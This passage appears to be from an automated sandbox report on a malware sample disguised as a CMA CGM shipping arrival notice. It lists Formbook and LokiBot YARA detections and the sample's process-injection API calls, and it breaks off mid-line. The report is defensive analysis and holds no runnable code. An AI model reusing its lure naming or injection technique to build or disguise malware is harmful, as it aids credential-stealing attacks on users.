      Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.1744759427.0000000000A04000.00000004.00000020.sdmp, type: MEMORY, Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, Code function: String function: 1E60B150 appears 32 times
      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 0486B150 appears 32 times
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, Code function: 0_2_0078F4F6 NtWriteVirtualMemory,LoadLibraryA,0_2_0078F4F6
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, Code function: 0_2_0078B52A NtAllocateVirtualMemory,0_2_0078B52A
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, Code function: 0_2_00793504 LoadLibraryA,NtSetContextThread,0_2_00793504
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, Code function: 0_2_007875D7 NtWriteVirtualMemory,LoadLibraryA,0_2_007875D7
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, Code function: 0_2_0078A83B NtWriteVirtualMemory,LoadLibraryA,0_2_0078A83B
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, Code function: 0_2_00792D4E NtProtectVirtualMemory,0_2_00792D4E
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, Code function: 0_2_0078907D NtWriteVirtualMemory,0_2_0078907D
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, Code function: 0_2_0078A058 NtWriteVirtualMemory,0_2_0078A058
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, Code function: 0_2_0078A03A NtWriteVirtualMemory,0_2_0078A03A
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, Code function: 0_2_0078A0D4 NtWriteVirtualMemory,0_2_0078A0D4
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .e